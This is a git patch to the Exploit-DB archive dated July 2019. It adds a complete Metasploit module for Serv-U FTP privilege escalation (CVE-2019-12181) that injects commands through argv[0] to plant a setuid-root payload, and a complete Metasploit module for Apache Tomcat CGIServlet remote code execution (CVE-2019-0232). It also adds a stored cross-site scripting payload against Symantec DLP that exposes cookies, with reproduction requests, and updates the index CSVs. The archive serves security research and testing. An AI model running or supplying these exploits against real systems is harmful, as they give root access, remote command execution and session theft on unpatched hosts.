From 1a13989f12a356d0380c3bb98dcf7d48cb3745e6 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 4 Jul 2019 05:01:54 +0000 Subject: [PATCH] DB: 2019-07-04 5 changes to exploits/shellcodes Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit) Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit) AZADMIN CMS 1.0 - SQL Injection WordPress Plugin iLive 1.0.4 - Cross-Site Scripting WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting WordPress Plugin iLive 1.0.4 - Cross-Site Scripting WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting WorkSuite PRM 2.4 - 'password' SQL Injection CiuisCRM 1.6 - 'eventType' SQL Injection Varient 1.6.1 - SQL Injection WorkSuite PRM 2.4 - 'password' SQL Injection CiuisCRM 1.6 - 'eventType' SQL Injection Varient 1.6.1 - SQL Injection Symantec DLP 15.5 MP1 - Cross-Site Scripting Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes) --- exploits/linux/local/47072.rb | 172 ++++++++++++++++++++++++++++ exploits/linux/webapps/47059.txt | 1 - exploits/multiple/webapps/47071.txt | 81 +++++++++++++ exploits/windows/remote/47073.rb | 131 +++++++++++++++++++++ files_exploits.csv | 15 ++- files_shellcodes.csv | 2 +- shellcodes/linux_x86/47068.c | 2 +- 7 files changed, 395 insertions(+), 9 deletions(-) create mode 100755 exploits/linux/local/47072.rb create mode 100644 exploits/multiple/webapps/47071.txt create mode 100755 exploits/windows/remote/47073.rb diff --git a/exploits/linux/local/47072.rb b/exploits/linux/local/47072.rb new file mode 100755 index 000000000..a26288eb9 --- /dev/null +++ b/exploits/linux/local/47072.rb @@ -0,0 +1,172 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Linux::Kernel + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Serv-U FTP Server prepareinstallation Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges on systems running + Serv-U FTP Server versions prior to 15.1.7. + + The `Serv-U` executable is setuid `root`, and uses `ARGV[0]` + in a call to `system()`, without validation, when invoked with + the `-prepareinstallation` flag, resulting in command execution + with root privileges. + + This module has been tested successfully on Serv-U FTP Server + version 15.1.6 (x64) on Debian 9.6 (x64). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Guy Levin', # @va_start - Discovery and exploit + 'bcoles' # Metasploit + ], + 'DisclosureDate' => '2019-06-05', + 'References' => + [ + ['CVE', '2019-12181'], + ['EDB', '47009'], + ['PACKETSTORM', '153333'], + ['URL', 'https://github.com/guywhataguy/CVE-2019-12181'], + ['URL', 'https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181'], + ['URL', 'https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html'], + ['URL', 'https://documentation.solarwinds.com/en/success_center/servu/Content/Release_Notes/Servu_15-1-7_release_notes.htm'], + ['URL', 'https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-Potential-elevation-of-privileges-on-Linux-systems'] + ], + 'Platform' => ['linux'], + 'Arch' => + [ + ARCH_X86, + ARCH_X64, + ARCH_ARMLE, + ARCH_AARCH64, + ARCH_PPC, + ARCH_MIPSLE, + ARCH_MIPSBE + ], + 'SessionTypes' => ['shell', 'meterpreter'], + 'Targets' => [['Auto', {}]], + 'DefaultOptions' => + { + 'PrependSetresuid' => true, + 'PrependSetresgid' => true, + 'PrependFork' => true, + 'WfsDelay' => 30 + }, + 'DefaultTarget' => 0)) + register_options [ + OptString.new('SERVU_PATH', [true, 'Path to Serv-U executable', '/usr/local/Serv-U/Serv-U']) + ] + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]), + OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) + ] + end + + def servu_path + datastore['SERVU_PATH'] + end + + def base_dir + datastore['WritableDir'].to_s + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + register_file_for_cleanup path + end + + def upload_and_chmodx(path, data) + upload path, data + chmod path + end + + def check + unless command_exists? 'bash' + vprint_error 'bash shell is not available' + return CheckCode::Safe + end + vprint_good 'bash shell is available' + + unless cmd_exec("test -x '#{servu_path}' && echo true").include? 'true' + vprint_error "#{servu_path} is not executable" + return CheckCode::Safe + end + vprint_good "#{servu_path} is executable" + + unless setuid? servu_path + vprint_error "#{servu_path} is not setuid" + return CheckCode::Safe + end + vprint_good "#{servu_path} is setuid" + + CheckCode::Detected + end + + def exploit + unless check == CheckCode::Detected + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + if is_root? + unless datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' + end + end + + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + if nosuid? base_dir + fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid" + end + + payload_name = ".#{rand_text_alphanumeric 10..15}" + @payload_path = "#{base_dir}/#{payload_name}" + upload_and_chmodx @payload_path, generate_payload_exe + + argv0 = %Q{\\";chown root #{@payload_path};chmod u+s #{@payload_path};chmod +x #{@payload_path}\\"} + cmd = %Q{bash -c 'exec -a "#{argv0}" #{servu_path} -prepareinstallation'} + vprint_status "Executing command: #{cmd}" + cmd_exec cmd + + unless setuid? @payload_path + fail_with Failure::Unknown, 'Failed to set payload setuid root' + end + print_good "#{@payload_path} setuid root successfully" + + print_status 'Executing payload...' + res = cmd_exec "#{@payload_path} &" + vprint_line res + end + + def on_new_session(session) + if session.type.eql? 'meterpreter' + session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' + session.fs.file.rm @payload_path + else + session.shell_command_token "rm -f '#{@payload_path}'" + end + ensure + super + end +end \ No newline at end of file diff --git a/exploits/linux/webapps/47059.txt b/exploits/linux/webapps/47059.txt index 2f5c0bf58..d5d532897 100644 --- a/exploits/linux/webapps/47059.txt +++ b/exploits/linux/webapps/47059.txt @@ -3,7 +3,6 @@ # Date: 6/29/2019 # Exploit Author: Joey Lane # Vendor Homepage: https://www.cyberpowersystems.com -# Software Link: https://dl4jz3rbrsfum.cloudfront.net/software/ppbe340-linux-x86_64.sh # Version: 3.4.0 # Tested on: Ubuntu 16.04 # CVE : Pending diff --git a/exploits/multiple/webapps/47071.txt b/exploits/multiple/webapps/47071.txt new file mode 100644 index 000000000..8981f58f8 --- /dev/null +++ b/exploits/multiple/webapps/47071.txt @@ -0,0 +1,81 @@ +# Exploit Title: Persistent XSS on Symantec DLP <= 15.5 MP1 +# Date: 2019-06-21 +# Exploit Author: Chapman Schleiss +# Vendor Homepage: https://www.symantec.com/ +# Software Link: https://support.symantec.com/us/en/mysymantec.html +# Version: <= 15.5 MP1 +# CVE : 2019-9701 +# Advisory-URL: https://support.symantec.com/us/en/article.SYMSA1484.html +# Hot Fix: https://support.symantec.com/us/en/article.ALERT2664.html + +Description +--------------- +Persistent XSS via 'name' param at +/ProtectManager/enforce/admin/senderrecipientpatterns/list + + +Payload: ' oNmouseover=prompt(document.domain,document.cookie) ) +Browser: Firefox 64, IE 11 +Date Observed: 15 January 2019 + + +Reproduction POST +----------------- +POST +/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/update +HTTP/1.1 +Host: [snip].com:8443 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) +Gecko/20100101 Firefox/64.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https:// +[snip].com:8443/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/edit?id=41&version=30 +Content-Type: application/x-www-form-urlencoded +Content-Length: 558 +Connection: close + +name=%27+oNmouseover%3Dprompt%28document.domain%2Cdocument.cookie%29+%29&description=some_text&userPatterns=test% +40test.com&ipAddresses=192.168.1.1&urlDomains=mail.company.com +&id=41&version=30 + +Reproduction GET +---------------- +GET /ProtectManager/enforce/admin/senderrecipientpatterns/list HTTP/1.1 +Host: [snip].com:8443 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) +Gecko/20100101 Firefox/64.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https:// +[snip].com:8443/ProtectManager/enforce/admin/senderrecipientpatterns/recipient_patterns/edit?id=41&version=30 +Connection: close + +Reproduction Response +--------------------- +
+
+
+
+
+ Success +
+
+
Recipient pattern '' oNmouseover=prompt(document.domain,document.cookie) )' was saved successfully.
+
+
+ +
+
+
+
+
\ No newline at end of file diff --git a/exploits/windows/remote/47073.rb b/exploits/windows/remote/47073.rb new file mode 100755 index 000000000..38879d7c9 --- /dev/null +++ b/exploits/windows/remote/47073.rb @@ -0,0 +1,131 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the + enableCmdLineArguments setting is set to true, a remote user can abuse this to execute + system commands, and gain remote code execution. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Yakov Shafranovich', # Original discovery + 'sinn3r' # Metasploit module + ], + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => + [ + [ 'Apache Tomcat 9.0 or prior for Windows', { } ] + ], + 'References' => + [ + ['CVE', '2019-0232'], + ['URL', 'https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/'], + ['URL', 'https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/'] + ], + 'Notes' => + { + 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ], + 'Reliability' => [ REPEATABLE_SESSION ], + 'Stability' => [ CRASH_SAFE ] + }, + 'CmdStagerFlavor' => 'vbs', + 'DefaultOptions' => + { + 'RPORT' => 8080 + }, + 'Privileged' => false, + 'DisclosureDate' => 'Apr 10 2019', # Date of public advisory issued by the vendor + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI path to CGI script', '/']) + ]) + + register_advanced_options( + [ + OptBool.new('ForceExploit', [false, 'Override check result', false]) + ]) + + deregister_options('SRVHOST', 'SRVPORT', 'URIPATH') + end + + def check + sig = Rex::Text.rand_text_alpha(10) + uri = normalize_uri(target_uri.path) + uri << "?&echo+#{sig}" + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri + }) + + unless res + vprint_error('No Response from server') + return CheckCode::Unknown + end + + if res.body.include?(sig) + return CheckCode::Vulnerable + end + + CheckCode::Safe + end + + def execute_command(cmd, opts={}) + # Our command stager assumes we have access to environment variables. + # We don't necessarily have that, so we have to modify cscript to a full path. + cmd.gsub!('cscript', 'C:\\Windows\\System32\\cscript.exe') + + uri = normalize_uri(target_uri.path) + uri << "?&#{CGI.escape(cmd)}" + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => uri + }) + + unless res + fail_with(Failure::Unreachable, 'No response from server') + end + + unless res.code == 200 + fail_with(Failure::Unknown, "Unexpected server response: #{res.code}") + end + end + + # it seems we don't really have a way to retrieve the filenames from the VBS command stager, + # so we need to rely on the user to cleanup the files. + def on_new_session(cli) + print_warning('Make sure to manually cleanup the exe generated by the exploit') + super + end + + def exploit + print_status("Checking if #{rhost} is vulnerable") + unless check == CheckCode::Vulnerable + unless datastore['ForceExploit'] + fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.') + end + + print_warning('Target does not appear to be vulnerable.') + end + + print_status("#{rhost} seems vulnerable, what a good day.") + execute_cmdstager(flavor: :vbs, temp: '.', linemax: 7000) + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 11b13f218..bde51eef6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10564,6 +10564,7 @@ id,file,description,date,author,type,platform,port 47012,exploits/windows/local/47012.py,"Tuneclone 2.20 - Local SEH Buffer Overflow",2019-06-20,Achilles,local,windows, 47017,exploits/linux/local/47017.rb,"Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)",2019-06-20,Metasploit,local,linux, 47070,exploits/macos/local/47070.rb,"Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)",2019-07-02,Metasploit,local,macos, +47072,exploits/linux/local/47072.rb,"Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)",2019-07-03,Metasploit,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17518,6 +17519,7 @@ id,file,description,date,author,type,platform,port 47039,exploits/linux/remote/47039.rb,"Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)",2019-06-26,Metasploit,remote,linux, 47047,exploits/linux/remote/47047.rb,"Linux Mint 18.3-19.1 - 'yelp' Command Injection (Metasploit)",2019-07-01,b1ack0wl,remote,linux, 47067,exploits/hardware/remote/47067.py,"FaceSentry Access Control System 6.4.8 - Remote SSH Root",2019-07-01,LiquidWorm,remote,hardware, +47073,exploits/windows/remote/47073.rb,"Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit)",2019-07-03,Metasploit,remote,windows,8080 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41437,14 +41439,14 @@ id,file,description,date,author,type,platform,port 47022,exploits/php/webapps/47022.txt,"SeedDMS versions < 5.1.11 - Remote Command Execution",2019-06-24,"Nimit Jain",webapps,php, 47027,exploits/multiple/webapps/47027.py,"GrandNode 4.40 - Path Traversal / Arbitrary File Download",2019-06-24,"Corey Robinson",webapps,multiple, 47033,exploits/hardware/webapps/47033.html,"Fortinet FCM-MB40 - Cross-Site Request Forgery / Remote Command Execution",2019-06-25,XORcat,webapps,hardware, -47034,exploits/php/webapps/47034.txt,"AZADMIN CMS 1.0 - SQL Injection",2019-06-25,"felipe andrian",webapps,php, +47034,exploits/php/webapps/47034.txt,"AZADMIN CMS 1.0 - SQL Injection",2019-06-25,"felipe andrian",webapps,php,80 47035,exploits/aspx/webapps/47035.py,"BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal",2019-06-25,"Aaron Bishop",webapps,aspx, -47036,exploits/php/webapps/47036.txt,"WordPress Plugin iLive 1.0.4 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php, -47037,exploits/php/webapps/47037.txt,"WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php, +47036,exploits/php/webapps/47036.txt,"WordPress Plugin iLive 1.0.4 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,80 +47037,exploits/php/webapps/47037.txt,"WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,80 47044,exploits/php/webapps/47044.py,"LibreNMS 1.46 - 'addhost' Remote Code Execution",2019-06-28,Askar,webapps,php,80 -47045,exploits/php/webapps/47045.txt,"WorkSuite PRM 2.4 - 'password' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php, -47046,exploits/php/webapps/47046.txt,"CiuisCRM 1.6 - 'eventType' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php, -47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple, +47045,exploits/php/webapps/47045.txt,"WorkSuite PRM 2.4 - 'password' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,80 +47046,exploits/php/webapps/47046.txt,"CiuisCRM 1.6 - 'eventType' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,80 +47058,exploits/multiple/webapps/47058.txt,"Varient 1.6.1 - SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,multiple,80 47059,exploits/linux/webapps/47059.txt,"PowerPanel Business Edition - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,linux, 47060,exploits/php/webapps/47060.txt,"ZoneMinder 1.32.3 - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,php, 47061,exploits/multiple/webapps/47061.txt,"SAP Crystal Reports - Information Disclosure",2019-07-01,"Mohamed M.Fouad",webapps,multiple, @@ -41454,3 +41456,4 @@ id,file,description,date,author,type,platform,port 47065,exploits/hardware/webapps/47065.txt,"FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery",2019-07-01,LiquidWorm,webapps,hardware, 47066,exploits/hardware/webapps/47066.py,"FaceSentry Access Control System 6.4.8 - Remote Root Exploit",2019-07-01,LiquidWorm,webapps,hardware, 47069,exploits/php/webapps/47069.py,"Centreon 19.04 - Remote Code Execution",2019-07-02,Askar,webapps,php, +47071,exploits/multiple/webapps/47071.txt,"Symantec DLP 15.5 MP1 - Cross-Site Scripting",2019-07-03,"Chapman Schleiss",webapps,multiple,8443 diff --git a/files_shellcodes.csv b/files_shellcodes.csv index e1208f284..f13582632 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -986,4 +986,4 @@ id,file,description,date,author,type,platform 47055,shellcodes/arm/47055.c,"Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm 47056,shellcodes/arm/47056.c,"Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm 47057,shellcodes/arm/47057.c,"Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm -47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,kiriknik,shellcode,linux_x86 +47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86 diff --git a/shellcodes/linux_x86/47068.c b/shellcodes/linux_x86/47068.c index 7d577ab0f..3de6c346d 100644 --- a/shellcodes/linux_x86/47068.c +++ b/shellcodes/linux_x86/47068.c @@ -2,7 +2,7 @@ ;Category: Shellcode ;Title: GNU/Linux x86 - execve /bin/sh using JMP-CALL-POP technique (21 bytes) -;Author: kiriknik +;Author: Kirill Nikolaev ;Date: 01/07/2019 ;Architecture: Linux x86